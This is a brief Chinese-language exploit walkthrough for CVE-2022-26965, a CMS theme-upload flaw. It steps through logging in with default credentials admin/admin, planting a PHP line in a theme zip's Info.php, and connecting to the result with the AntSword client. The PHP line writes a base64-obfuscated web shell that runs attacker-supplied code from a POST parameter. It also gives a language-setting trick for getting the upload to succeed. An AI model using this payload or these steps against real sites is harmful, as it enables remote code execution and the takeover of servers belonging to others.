CVE-2022-26965

  1. 登录账号密码 admin admin
  2. 上传网上找的主题
    redline-theme-master.zip
  3. 修改主题zip中的Info.php
<?php file_put_contents('shell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSkgPz4=')); ?>
  1. 发现必须要改语言为中文才能上传成功。默认语言无法成功访问shell.php(其他语言没试)
  2. 蚁剑连接